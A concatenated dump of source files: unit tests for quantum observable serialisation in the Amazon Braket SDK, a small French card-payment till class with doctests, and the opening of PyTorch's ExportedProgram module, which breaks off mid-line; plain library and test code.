OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n [3, 0],\n \"h(q[3]) @ z(q[0])\",\n ),\n (\n Observable.H() @ Observable.Z(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3, 0],\n \"h($3) @ z($0)\",\n ),\n (\n Observable.H() @ Observable.Z() @ Observable.I(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n [3, 0, 1],\n \"h(q[3]) @ z(q[0]) @ i(q[1])\",\n ),\n (\n Observable.H() @ Observable.Z() @ Observable.I(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3, 0, 1],\n \"h($3) @ z($0) @ i($1)\",\n ),\n (\n Observable.Hermitian(np.eye(4)) @ Observable.I(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n [3, 0, 1],\n \"hermitian([[1+0im, 0im, 0im, 0im], [0im, 1+0im, 0im, 0im], \"\n \"[0im, 0im, 1+0im, 0im], [0im, 0im, 0im, 1+0im]]) q[3], q[0]\"\n \" @ i(q[1])\",\n ),\n (\n Observable.I() @ Observable.Hermitian(np.eye(4)),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3, 0, 1],\n \"i($3) @ \"\n \"hermitian([[1+0im, 0im, 0im, 0im], [0im, 1+0im, 0im, 0im], \"\n \"[0im, 0im, 1+0im, 0im], [0im, 0im, 0im, 1+0im]]) $0, $1\",\n ),\n (\n (2 * Observable.Z()) @ (3 * Observable.H()),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3, 3],\n \"6 * z($3) @ h($3)\",\n ),\n (\n (2 * Observable.Z()) @ (3 * Observable.H()) @ (2 * Observable.Y()),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3, 3, 1],\n \"12 * z($3) @ h($3) @ y($1)\",\n ),\n (\n 3 * (2 * Observable.Z()),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3],\n \"6 * z($3)\",\n ),\n (\n (2 * Observable.I()) @ (2 * Observable.Hermitian(np.eye(4))),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3, 0, 1],\n \"4 * i($3) @ \"\n \"hermitian([[1+0im, 0im, 0im, 0im], [0im, 1+0im, 0im, 0im], \"\n \"[0im, 0im, 1+0im, 0im], [0im, 0im, 0im, 1+0im]]) $0, $1\",\n ),\n (\n Observable.Z() + 2 * Observable.H(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [[3], [4]],\n \"z($3) + 2 * h($4)\",\n ),\n (\n 3 * (Observable.H() + 2 * Observable.X()),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [[3], [0]],\n \"3 * h($3) + 6 * x($0)\",\n ),\n (\n 3 * (Observable.H() + 2 * Observable.H()),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [[3], [3]],\n \"3 * h($3) + 6 * h($3)\",\n ),\n (\n 3 * (Observable.H() + 2 * Observable.H()),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [[3], [5]],\n \"3 * h($3) + 6 * h($5)\",\n ),\n (\n (2 * Observable.Y()) @ (3 * Observable.I()) + 0.75 * Observable.Y() @ Observable.Z(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [[0, 1], [0, 1]],\n \"6 * y($0) @ i($1) + 0.75 * y($0) @ z($1)\",\n ),\n (\n (-2 * Observable.Y()) @ (3 * Observable.I()) + -0.75 * Observable.Y() @ Observable.Z(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [[0, 1], [0, 1]],\n \"-6 * y($0) @ i($1) - 0.75 * y($0) @ z($1)\",\n ),\n (\n 4 * (2 * Observable.Z() + 2 * (3 * Observable.X() @ (2 * Observable.Y()))),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [[0], [1, 2]],\n \"8 * z($0) + 48 * x($1) @ y($2)\",\n ),\n ],\n)\ndef test_observables_to_ir_openqasm(observable, serialization_properties, target, expected_ir):\n assert (\n observable.to_ir(\n target, ir_type=IRType.OPENQASM, serialization_properties=serialization_properties\n )\n == expected_ir\n )\n\n\n@pytest.mark.parametrize(\n \"observable\",\n [\n 2 * Observable.H(),\n 3 * Observable.Z(),\n 2 * Observable.I(),\n 3 * Observable.X(),\n 2 * Observable.Y(),\n 2 * Observable.Hermitian(matrix=np.array([[0, 1], [1, 0]])),\n 2 * Observable.TensorProduct([Observable.Z(), Observable.H()]),\n ],\n)\ndef test_observable_coef_jaqcd(observable):\n coef_not_supported_with_jaqcd = \"Observable coefficients not supported with Jaqcd\"\n with pytest.raises(ValueError, match=coef_not_supported_with_jaqcd):\n observable.to_ir(target=0, ir_type=IRType.JAQCD)\n\n\n@pytest.mark.parametrize(\n \"expression, observable\",\n [\n ([], Observable.X()),\n ([2], Observable.Y()),\n ([2, \"invalid_str\"], Observable.Z()),\n ([2.0], Observable.Hermitian(matrix=np.array([[0, 1], [1, 0]]))),\n ([2], Observable.Sum([Observable.X() + Observable.Y()])),\n ([2], Observable.Y() + 0.75 * Observable.Y() @ Observable.Z()),\n ],\n)\ndef test_invalid_scalar_multiplication(expression, observable):\n with pytest.raises(TypeError, match=\"Observable coefficients must be numbers.\"):\n expression * observable\n\n\n@pytest.mark.parametrize(\n \"observable, matrix\",\n [\n (\n (-3 * Observable.H()).to_matrix(),\n np.array(\n [[-2.12132034 + 0.0j, -2.12132034 + 0.0j], [-2.12132034 + 0.0j, 2.12132034 - 0.0j]]\n ),\n ),\n (\n (3 * Observable.Z()).to_matrix(),\n np.array([[3.0 + 0.0j, 0.0 + 0.0j], [0.0 + 0.0j, -3.0 + 0.0j]]),\n ),\n (\n (2 * Observable.I()).to_matrix(),\n np.array([[2.0 + 0.0j, 0.0 + 0.0j], [0.0 + 0.0j, 2.0 + 0.0j]]),\n ),\n (\n (1.2 * Observable.X()).to_matrix(),\n np.array([[0.0 + 0.0j, 1.2 + 0.0j], [1.2 + 0.0j, 0.0 + 0.0j]]),\n ),\n (\n (1e-2 * Observable.Y()).to_matrix(),\n np.array([[0.0 + 0.0j, 0.0 - 0.01j], [0 + 0.01j, 0.0 + 0.0j]]),\n ),\n (\n (np.array(1.3) * Observable.Hermitian(matrix=np.array([[0, 1], [1, 0]]))).to_matrix(),\n np.array([[0.0 + 0.0j, 1.3 + 0.0j], [1.3 + 0.0j, 0.0 + 0.0j]]),\n ),\n (\n (2 * Observable.TensorProduct([Observable.Z(), Observable.H()])).to_matrix(),\n np.array(\n [\n [1.41421356 + 0.0j, 1.41421356 + 0.0j, 0.0 + 0.0j, 0.0 + 0.0j],\n [1.41421356 + 0.0j, -1.41421356 + 0.0j, 0.0 + 0.0j, -0.0 + 0.0j],\n [0.0 + 0.0j, 0.0 + 0.0j, -1.41421356 + 0.0j, -1.41421356 + 0.0j],\n [0.0 + 0.0j, -0.0 + 0.0j, -1.41421356 + 0.0j, 1.41421356 + 0.0j],\n ],\n ),\n ),\n ],\n)\ndef test_valid_scaled_matrix(observable, matrix):\n npt.assert_allclose(observable, matrix)\n\n\n@pytest.mark.parametrize(\n \"observable, eigenvalue\",\n [\n (-2 * Observable.I().eigenvalues, np.array([-2.0, -2.0])),\n (\n 3e-2 * Observable.Hermitian(matrix=np.array([[0, 1], [1, 0]])).eigenvalues,\n np.array([-0.03, 0.03]),\n ),\n ],\n)\ndef test_valid_scaled_eigenvalues(observable, eigenvalue):\n npt.assert_allclose(observable, eigenvalue)\n\n\n@pytest.mark.parametrize(\n \"testobject,gateobject,expected_ir,basis_rotation_gates,eigenvalues\", testdata\n)\ndef test_gate_equality(testobject, gateobject, expected_ir, basis_rotation_gates, eigenvalues):\n assert testobject.qubit_count == gateobject.qubit_count\n assert testobject.ascii_symbols == gateobject.ascii_symbols\n assert testobject.matrix_equivalence(gateobject)\n assert testobject.basis_rotation_gates == basis_rotation_gates\n assert np.allclose(testobject.eigenvalues, eigenvalues)\n\n\n@pytest.mark.parametrize(\n \"testobject,gateobject,expected_ir,basis_rotation_gates,eigenvalues\", testdata\n)\ndef test_basis_rotation_gates(\n testobject, gateobject, expected_ir, basis_rotation_gates, eigenvalues\n):\n assert testobject.basis_rotation_gates == basis_rotation_gates\n\n\n@pytest.mark.parametrize(\n \"testobject,gateobject,expected_ir,basis_rotation_gates,eigenvalues\", testdata\n)\ndef test_eigenvalues(testobject, gateobject, expected_ir, basis_rotation_gates, eigenvalues):\n compare_eigenvalues(testobject, eigenvalues)\n\n\n@pytest.mark.parametrize(\n \"testobject,gateobject,expected_ir,basis_rotation_gates,eigenvalues\", testdata\n)\ndef test_observable_from_ir(testobject, gateobject, expected_ir, basis_rotation_gates, eigenvalues):\n assert testobject == observable_from_ir(expected_ir)\n\n\n# Hermitian\n\n\n@pytest.mark.parametrize(\"matrix\", invalid_hermitian_matrices)\ndef test_hermitian_invalid_matrix(matrix):\n with pytest.raises(ValueError):\n Observable.Hermitian(matrix=matrix)\n\n\ndef test_hermitian_equality():\n matrix = Observable.H().to_matrix()\n a1 = Observable.Hermitian(matrix=matrix)\n a2 = Observable.Hermitian(matrix=matrix)\n a3 = Observable.Hermitian(matrix=Observable.I().to_matrix())\n a4 = \"hi\"\n assert a1 == a2\n assert a1 != a3\n assert a1 != a4\n\n\ndef test_hermitian_to_ir():\n matrix = Observable.I().to_matrix()\n obs = Observable.Hermitian(matrix=matrix)\n assert obs.to_ir() == [[[[1, 0], [0, 0]], [[0, 0], [1, 0]]]]\n\n\n@pytest.mark.parametrize(\n \"matrix,eigenvalues\",\n [\n (np.array([[1.0, 0.0], [0.0, 1.0]]), np.array([1, 1])),\n (np.array([[0, -1j], [1j, 0]]), np.array([-1.0, 1.0])),\n (np.array([[1, 1 - 1j], [1 + 1j, -1]]), np.array([-np.sqrt(3), np.sqrt(3)])),\n ],\n)\ndef test_hermitian_eigenvalues(matrix, eigenvalues):\n compare_eigenvalues(Observable.Hermitian(matrix=matrix), eigenvalues)\n\n\ndef test_flattened_tensor_product():\n observable_one = Observable.Z() @ Observable.Y()\n observable_two = Observable.X() @ Observable.H()\n actual = Observable.TensorProduct([observable_one, observable_two])\n expected = Observable.TensorProduct(\n [Observable.Z(), Observable.Y(), Observable.X(), Observable.H()]\n )\n assert expected == actual\n\n\n@pytest.mark.parametrize(\n \"matrix,basis_rotation_matrix\",\n [\n (\n np.array([[0.0, 1.0], [1.0, 0.0]]),\n np.array([[-0.70710678, 0.70710678], [0.70710678, 0.70710678]]).conj().T,\n ),\n (\n np.array([[0, -1j], [1j, 0]]),\n np.array(\n [[-0.70710678 + 0.0j, -0.70710678 + 0.0j], [0.0 + 0.70710678j, 0.0 - 0.70710678j]]\n )\n .conj()\n .T,\n ),\n (\n np.array([[1, 1 - 1j], [1 + 1j, -1]]),\n np.array(\n [\n [-0.45970084 - 0.0j, 0.62796303 - 0.62796303j],\n [-0.88807383 - 0.0j, -0.32505758 + 0.32505758j],\n ]\n ),\n ),\n ],\n)\ndef test_hermitian_basis_rotation_gates(matrix, basis_rotation_matrix):\n expected_unitary = Gate.Unitary(matrix=basis_rotation_matrix)\n actual_rotation_gates = Observable.Hermitian(matrix=matrix).basis_rotation_gates\n assert actual_rotation_gates == tuple([expected_unitary])\n assert expected_unitary.matrix_equivalence(actual_rotation_gates[0])\n\n\ndef test_observable_from_ir_hermitian_value_error():\n ir_observable = [[[[1.0, 0], [0, 1]], [[0.0, 1], [1, 0]]]]\n with pytest.raises(ValueError):\n observable_from_ir(ir_observable)\n\n\ndef test_observable_from_ir_hermitian():\n ir_observable = [[[[1, 0], [0, 0]], [[0, 0], [1, 0]]]]\n actual_observable = observable_from_ir(ir_observable)\n assert actual_observable == Observable.Hermitian(matrix=np.array([[1.0, 0.0], [0.0, 1.0]]))\n\n\ndef test_hermitian_str():\n assert (\n str(Observable.Hermitian(matrix=np.array([[1.0, 0.0], [0.0, 1.0]])))\n == \"Hermitian('qubit_count': 1, 'matrix': [[1.+0.j 0.+0.j], [0.+0.j 1.+0.j]])\"\n )\n\n\n# TensorProduct\n\n\ndef test_tensor_product_to_ir():\n t = Observable.TensorProduct([Observable.Z(), Observable.I(), Observable.X()])\n assert t.to_ir() == [\"z\", \"i\", \"x\"]\n assert t.qubit_count == 3\n assert t.ascii_symbols == tuple([\"Z@I@X\"] * 3)\n\n\ndef test_tensor_product_matmul_tensor():\n t1 = Observable.TensorProduct([Observable.Z(), Observable.I(), Observable.X()])\n t2 = Observable.TensorProduct(\n [Observable.Hermitian(matrix=Observable.I().to_matrix()), Observable.Y()]\n )\n t3 = t1 @ t2\n assert t3.to_ir() == [\"z\", \"i\", \"x\", [[[1.0, 0], [0, 0]], [[0, 0], [1.0, 0]]], \"y\"]\n assert t3.qubit_count == 5\n assert t3.ascii_symbols == tuple([\"Z@I@X@Hermitian@Y\"] * 5)\n\n\ndef test_tensor_product_matmul_observable():\n t1 = Observable.TensorProduct([Observable.Z(), Observable.I(), Observable.X()])\n o1 = Observable.I()\n t = t1 @ o1\n assert t.to_ir() == [\"z\", \"i\", \"x\", \"i\"]\n assert t.qubit_count == 4\n assert t.ascii_symbols == tuple([\"Z@I@X@I\"] * 4)\n\n\ndef test_tensor_product_eigenvalue_index_out_of_bounds():\n obs = Observable.TensorProduct([Observable.Z(), Observable.I(), Observable.X()])\n with pytest.raises(ValueError):\n obs.eigenvalue(8)\n\n\ndef test_tensor_product_value_error():\n with pytest.raises(ValueError):\n Observable.TensorProduct([Observable.Z(), Observable.I(), Observable.X()]) @ \"a\"\n\n\ndef test_tensor_product_rmatmul_observable():\n t1 = Observable.TensorProduct([Observable.Z(), Observable.I(), Observable.X()])\n o1 = Observable.I()\n t = o1 @ t1\n assert t.to_ir() == [\"i\", \"z\", \"i\", \"x\"]\n assert t.qubit_count == 4\n assert t.ascii_symbols == tuple([\"I@Z@I@X\"] * 4)\n\n\n@pytest.mark.parametrize(\n \"observable,eigenvalues\",\n [\n (Observable.X() @ Observable.Y(), np.array([1, -1, -1, 1])),\n (Observable.X() @ Observable.Y() @ Observable.Z(), np.array([1, -1, -1, 1, -1, 1, 1, -1])),\n (Observable.X() @ Observable.Y() @ Observable.I(), np.array([1, 1, -1, -1, -1, -1, 1, 1])),\n (\n Observable.X()\n @ Observable.Hermitian(\n np.array([[-1, 0, 0, 0], [0, -1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]])\n )\n @ Observable.Y(),\n np.array([-1, 1, -1, 1, 1, -1, 1, -1, 1, -1, 1, -1, -1, 1, -1, 1]),\n ),\n ],\n)\ndef test_tensor_product_eigenvalues(observable, eigenvalues):\n compare_eigenvalues(observable, eigenvalues)\n # Test caching\n observable._factors = ()\n compare_eigenvalues(observable, eigenvalues)\n\n\n@pytest.mark.parametrize(\n \"observable,basis_rotation_gates\",\n [\n (Observable.X() @ Observable.Y(), tuple([Gate.H(), Gate.Z(), Gate.S(), Gate.H()])),\n (\n Observable.X() @ Observable.Y() @ Observable.Z(),\n tuple([Gate.H(), Gate.Z(), Gate.S(), Gate.H()]),\n ),\n (\n Observable.X() @ Observable.Y() @ Observable.I(),\n tuple([Gate.H(), Gate.Z(), Gate.S(), Gate.H()]),\n ),\n (Observable.X() @ Observable.H(), tuple([Gate.H(), Gate.Ry(-np.pi / 4)])),\n ],\n)\ndef test_tensor_product_basis_rotation_gates(observable, basis_rotation_gates):\n assert observable.basis_rotation_gates == basis_rotation_gates\n\n\ndef test_observable_from_ir_tensor_product():\n expected_observable = Observable.TensorProduct([Observable.Z(), Observable.I(), Observable.X()])\n actual_observable = observable_from_ir([\"z\", \"i\", \"x\"])\n assert expected_observable == actual_observable\n\n\ndef test_observable_from_ir_tensor_product_value_error():\n with pytest.raises(ValueError):\n observable_from_ir([\"z\", \"i\", \"foo\"])\n\n\ndef compare_eigenvalues(observable, expected):\n assert np.allclose(observable.eigenvalues, expected)\n assert np.allclose(\n np.array([observable.eigenvalue(i) for i in range(2**observable.qubit_count)]),\n expected,\n )\n\n\ndef test_sum_not_allowed_in_tensor_product():\n sum_not_allowed_in_tensor_product = \"Sum observables not allowed in TensorProduct\"\n with pytest.raises(TypeError, match=sum_not_allowed_in_tensor_product):\n Observable.TensorProduct([Observable.X() + Observable.Y()])\n\n\n# Sum of observables\n\n\n@pytest.mark.parametrize(\n \"observable,basis_rotation_gates\",\n [\n (Observable.X() + Observable.Y(), tuple([Gate.H(), Gate.Z(), Gate.S(), Gate.H()])),\n ],\n)\ndef test_no_basis_rotation_support_for_sum(observable, basis_rotation_gates):\n no_basis_rotation_support_for_sum = \"Basis rotation calculation not supported for Sum\"\n with pytest.raises(NotImplementedError, match=no_basis_rotation_support_for_sum):\n observable.basis_rotation_gates\n\n\ndef test_no_eigenvalues_support_for_sum():\n no_eigen_value_support = \"Eigenvalue calculation not supported for Sum\"\n with pytest.raises(NotImplementedError, match=no_eigen_value_support):\n (Observable.X() + Observable.Y()).eigenvalues\n\n\ndef test_matrix_not_supported_for_sum():\n matrix_not_supported = \"Matrix operation is not supported for Sum\"\n with pytest.raises(NotImplementedError, match=matrix_not_supported):\n (Observable.X() + Observable.Y()).to_matrix()\n\n\ndef test_invalid_targets_config_for_sum_obs():\n observable, serialization_properties = (\n 2 * Observable.X() @ Observable.Y() + 0.75 * Observable.Y() @ Observable.Z(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n )\n target = [[0, 1]]\n\n target_len_mismatch_for_sum_terms = \"Invalid target of length 1 for Sum with 2 terms\"\n\n with pytest.raises(ValueError, match=target_len_mismatch_for_sum_terms):\n observable.to_ir(\n target, ir_type=IRType.OPENQASM, serialization_properties=serialization_properties\n )\n\n\ndef test_sum_obs_str():\n assert (\n str(Observable.Sum([2 * Observable.X() + 3 * Observable.Y()]))\n == \"Sum(X('qubit_count': 1), Y('qubit_count': 1))\"\n )\n\n\ndef test_str_equality_sum_obs():\n t1 = Observable.Sum([2 * Observable.X() + 3 * Observable.Y()])\n t2 = Observable.Sum([2 * Observable.X() + 3 * Observable.Y()])\n t3 = Observable.Sum([2 * Observable.Z() + 3 * Observable.H()])\n t4 = Observable.Sum([Observable.Z() + Observable.H()])\n assert t1 == t2\n assert t2 != t3\n assert t1 != t3\n assert t3 == t4\n\n\ndef test_invalid_target_length_for_sum_obs_term():\n observable, serialization_properties = (\n 2 * Observable.Y() + 0.75 * Observable.Y() @ Observable.Z(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n )\n target = [[0, 1], [0, 1]]\n\n invalid_target_len_for_term = \"Invalid target for term 0 of Sum. Expected 1 targets, got 2\"\n\n with pytest.raises(ValueError, match=invalid_target_len_for_term):\n observable.to_ir(\n target, ir_type=IRType.OPENQASM, serialization_properties=serialization_properties\n )\n\n\ndef test_unscaled_tensor_product():\n observable = 3 * ((2 * Observable.X()) @ (5 * Observable.Y()))\n assert observable == 30 * (Observable.X() @ Observable.Y())\n assert observable._unscaled() == Observable.X() @ Observable.Y()\n","repo_name":"amazon-braket/amazon-braket-sdk-python","sub_path":"test/unit_tests/braket/circuits/test_observables.py","file_name":"test_observables.py","file_ext":"py","file_size_in_byte":24836,"program_lang":"python","lang":"en","doc_type":"code","stars":261,"dataset":"github-code","pt":"72"} +{"seq_id":"38126948160","text":"#TP4 SVL\n\nfrom carte import Carte\n\nclass Caisse:\n \"\"\"\n Ainsi qu'un nouvel objet Caisse\n >>> caisse = Caisse()\n\n On a également besoin d'un objet Carte\n >>> carte = Carte(200,2,8)\n\n On peut ensuite décider de payer sans utiliser\n de ticket quand le solde est suffisant\n >>> caisse.payerSansTicket(carte,10)\n\n Le solde de la carte vaut à présent 190\n >>> carte.getSolde()\n 190\n\n On paye à présent avec une carte dont\n le solde est insuffisant\n >>> carte = Carte(10,5,8)\n >>> caisse.payerSansTicket(carte,13)\n Traceback (most recent call last):\n ...\n ValueError\n\n On veut à présent payer en utilisant les\n tickets pour un montant qui est inférieur\n à la valeur d'un ticket\n >>> caisse.payerAvecTicket(carte,7)\n\n Un ticket a été débité de la carte\n >>> carte.getTickets()\n 4\n\n On veut à présent payer avec un ticket dont\n le montant est inférieur au montant dû\n >>> caisse.payerAvecTicket(carte,10)\n\n Dans ce cas, un ticket est débité de la\n carte mais le reste dû est également\n débité du solde de la carte\n >>> carte.getTickets()\n 3\n >>> carte.getSolde()\n 8\n\n A présent, on souhaite payer avec un ticket\n pour un montant supérieur à la valeur d'un\n ticket mais sans avoir un solde suffisant\n sur la carte\n >>> carte = Carte(2,3,8)\n >>> caisse.payerAvecTicket(carte,15)\n Traceback (most recent call last):\n ...\n ValueError\n\n Enfin, on souhaite payer avec un ticket\n sans aucun ticket sur la carte\n >>> carte = Carte(100,0,8)\n >>> caisse.payerAvecTicket(carte,10)\n\n Dans ce cas là, c'est le solde de la carte\n qui est débité:\n >>> carte.getSolde()\n 90\n\n \"\"\"\n def payerSansTicket(self, carte, montant):\n \"\"\"\n Permet de payer un certain montant avec\n une carte sans utiliser de ticket.\n\n Une exception est levée si le solde\n est inférieur au montant dû.\n \"\"\"\n solde = carte.getSolde()\n if solde >= montant:\n carte.debiter(montant)\n else:\n raise ValueError()\n\n def payerAvecTicket(self, carte, montant):\n \"\"\"\n Permet de payer un certain montant\n avec un ticket.\n\n On débite un ticket de la carte si\n il y en a au moins 1 et ensuite on\n débite le solde de carte si le montant\n dû est supérieur à la valeur d'un ticket.\n\n Enfin, on débite le solde de la carte si\n le solde est suffisant et que le nombre de\n ticket est insuffisant.\n\n Une exception est levée si le solde de\n la carte est inférieur au montant dû.\n \"\"\"\n ticket = carte.getTickets()\n valeurTicket = carte.getTicketValue()\n if ticket >= 1:\n carte.debiterAvecTicket()\n if valeurTicket < montant:\n self.payerSansTicket(carte, montant - valeurTicket)\n else:\n self.payerSansTicket(carte, montant)\n","repo_name":"quentin-burg/tp-svl","sub_path":"TP4/caisse.py","file_name":"caisse.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14832148209","text":"import copy\nimport dataclasses\nfrom typing import (\n Any,\n Callable,\n Dict,\n Iterator,\n List,\n Optional,\n Tuple,\n Type,\n TYPE_CHECKING,\n Union,\n)\n\nif TYPE_CHECKING:\n # Import the following modules during type checking to enable code intelligence features,\n # such as auto-completion in tools like pylance, even when these modules are not explicitly\n # imported in user code.\n\n import sympy\n\n from torch.utils._sympy.value_ranges import ValueRanges\n\nimport torch\nimport torch.fx._pytree as fx_pytree\nimport torch.utils._pytree as pytree\nfrom torch.fx._compatibility import compatibility\n\nfrom torch.fx.passes.infra.pass_base import PassResult\nfrom torch.fx.passes.infra.pass_manager import PassManager\n\nfrom .graph_signature import ( # noqa: F401\n _sig_to_specs,\n ArgumentSpec,\n ConstantArgument,\n ExportGraphSignature,\n InputKind,\n InputSpec,\n OutputKind,\n OutputSpec,\n SymIntArgument,\n TensorArgument,\n)\n\n\n__all__ = [\n \"ExportedProgram\",\n \"ModuleCallEntry\",\n \"ModuleCallSignature\",\n]\n\n\nPassType = Callable[[torch.fx.GraphModule], Optional[PassResult]]\n\n\n@dataclasses.dataclass\nclass ModuleCallSignature:\n inputs: List[ArgumentSpec]\n outputs: List[ArgumentSpec]\n in_spec: pytree.TreeSpec\n out_spec: pytree.TreeSpec\n\n\n@dataclasses.dataclass\nclass ModuleCallEntry:\n fqn: str\n signature: Optional[ModuleCallSignature] = None\n\n\nclass ExportedProgram:\n \"\"\"\n Package of a program from :func:`export`. It contains\n an :class:`torch.fx.Graph` that represents Tensor computation, a state_dict containing\n tensor values of all lifted parameters and buffers, and various metadata.\n\n You can call an ExportedProgram like the original callable traced by\n :func:`export` with the same calling convention.\n\n To perform transformations on the graph, use ``.module`` property to access\n an :class:`torch.fx.GraphModule`. You can then use\n `FX transformation `_\n to rewrite the graph. Afterwards, you can simply use :func:`export`\n again to construct a correct ExportedProgram.\n \"\"\"\n\n def __init__(\n self,\n root: Union[torch.nn.Module, Dict[str, Any]],\n graph: torch.fx.Graph,\n graph_signature: ExportGraphSignature,\n state_dict: Dict[str, Union[torch.Tensor, torch.nn.Parameter]],\n range_constraints: \"Dict[sympy.Symbol, Any]\",\n equality_constraints: List[Tuple[Any, Any]],\n module_call_graph: List[ModuleCallEntry],\n example_inputs: Optional[Tuple[Tuple[Any, ...], Dict[str, Any]]] = None,\n verifier: Optional[Type[Any]] = None, # TODO Change typing hint to Verifier.\n ):\n from torch._export.exported_program import _create_graph_module_for_export\n from torch._export.passes.add_runtime_assertions_for_constraints_pass import (\n InputDim,\n )\n\n # Remove codegen related things from the graph. It should just be a flat graph.\n graph._codegen = torch.fx.graph.CodeGen()\n self._graph_module = _create_graph_module_for_export(root, graph)\n if isinstance(root, torch.fx.GraphModule):\n self._graph_module.meta.update(root.meta)\n\n self._graph_signature: ExportGraphSignature = graph_signature\n self._state_dict: Dict[str, Any] = state_dict\n self._range_constraints: \"Dict[sympy.Symbol, ValueRanges]\" = range_constraints\n self._equality_constraints: List[\n Tuple[InputDim, InputDim]\n ] = equality_constraints\n self._module_call_graph: List[ModuleCallEntry] = module_call_graph\n self._example_inputs = example_inputs\n\n from torch._export.verifier import Verifier\n\n if verifier is None:\n verifier = Verifier\n assert issubclass(verifier, Verifier)\n self._verifier = verifier\n\n # Validate should be always the last step of the constructor.\n # TODO(zhxchen17) Uncomment the following line.\n # self.verifier().check(self)\n\n @property\n @compatibility(is_backward_compatible=False)\n def graph_module(self):\n return self._graph_module\n\n @property\n @compatibility(is_backward_compatible=False)\n def graph(self):\n return self.graph_module.graph\n\n @property\n @compatibility(is_backward_compatible=False)\n def graph_signature(self):\n return self._graph_signature\n\n @property\n @compatibility(is_backward_compatible=False)\n def state_dict(self):\n return self._state_dict\n\n @compatibility(is_backward_compatible=False)\n def parameters(self) -> Iterator[torch.nn.Parameter]:\n \"\"\"\n Returns an iterator over original module's parameters.\n \"\"\"\n for _, param in self.named_parameters():\n yield param\n\n @compatibility(is_backward_compatible=False)\n def named_parameters(self) -> Iterator[Tuple[str, torch.nn.Parameter]]:\n \"\"\"\n Returns an iterator over original module parameters, yielding\n both the name of the parameter as well as the parameter itself.\n \"\"\"\n for param_name in self.graph_signature.parameters:\n yield param_name, self.state_dict[param_name]\n\n @compatibility(is_backward_compatible=False)\n def buffers(self) -> Iterator[torch.Tensor]:\n \"\"\"\n Returns an iterator over original module buffers.\n \"\"\"\n for _, buf in self.named_buffers():\n yield buf\n\n @compatibility(is_backward_compatible=False)\n def named_buffers(self) -> Iterator[Tuple[str, torch.Tensor]]:\n \"\"\"\n Returns an iterator over original module buffers, yielding\n both the name of the buffer as well as the buffer itself.\n \"\"\"\n for buffer_name in self.graph_signature.buffers:\n yield buffer_name, self.state_dict[buffer_name]\n\n @property\n @compatibility(is_backward_compatible=False)\n def range_constraints(self):\n return self._range_constraints\n\n @property\n @compatibility(is_backward_compatible=False)\n def equality_constraints(self):\n return self._equality_constraints\n\n @property\n @compatibility(is_backward_compatible=False)\n def module_call_graph(self):\n return self._module_call_graph\n\n @property\n @compatibility(is_backward_compatible=False)\n def example_inputs(self):\n return self._example_inputs\n\n @property\n @compatibility(is_backward_compatible=False)\n def call_spec(self):\n from torch._export.exported_program import CallSpec\n\n if len(self.module_call_graph) == 0:\n return CallSpec(in_spec=None, out_spec=None)\n assert self.module_call_graph[0].fqn == \"\"\n return CallSpec(\n in_spec=self.module_call_graph[0].signature.in_spec,\n out_spec=self.module_call_graph[0].signature.out_spec,\n )\n\n @property\n @compatibility(is_backward_compatible=False)\n def verifier(self) -> Any:\n return self._verifier\n\n @property\n @compatibility(is_backward_compatible=False)\n def dialect(self) -> str:\n return self._verifier.dialect\n\n def __call__(self, *args: Any, **kwargs: Any) -> Any:\n import torch._export.error as error\n from torch._export import combine_args_kwargs\n\n if self.call_spec.in_spec is not None:\n try:\n user_args = combine_args_kwargs(args, kwargs)\n args = fx_pytree.tree_flatten_spec(\n user_args, self.call_spec.in_spec, exact_structural_match=True\n ) # type: ignore[assignment]\n except Exception:\n _, received_spec = pytree.tree_flatten(user_args)\n raise TypeError( # noqa: TRY200\n \"Trying to flatten user inputs with exported input tree spec: \\n\"\n f\"{self.call_spec.in_spec}\\n\"\n \"but actually got inputs with tree spec of: \\n\"\n f\"{received_spec}\"\n )\n\n ordered_params = tuple(\n self.state_dict[name] for name in self.graph_signature.parameters\n )\n ordered_buffers = tuple(\n self.state_dict[name] for name in self.graph_signature.buffers\n )\n self._check_input_constraints(*ordered_params, *ordered_buffers, *args)\n\n # NOTE: calling convention is first params, then buffers, then args as user supplied them.\n # See: torch/_functorch/aot_autograd.py#L1034\n res = torch.fx.Interpreter(self.graph_module).run(\n *ordered_params, *ordered_buffers, *args, enable_io_processing=False\n )\n\n if self.call_spec.out_spec is not None:\n mutation = self.graph_signature.buffers_to_mutate\n num_mutated = len(mutation)\n mutated_buffers = res[:num_mutated]\n\n # Exclude dependency token from final result.\n assertion_dep_token = self.graph_signature.assertion_dep_token\n if assertion_dep_token is not None:\n assertion_dep_token_index = list(assertion_dep_token.keys())[0]\n res = res[:assertion_dep_token_index]\n\n res = res[num_mutated:]\n try:\n res = pytree.tree_unflatten(res, self.call_spec.out_spec)\n except Exception:\n _, received_spec = pytree.tree_flatten(res)\n raise error.InternalError( # noqa: TRY200\n \"Trying to flatten user 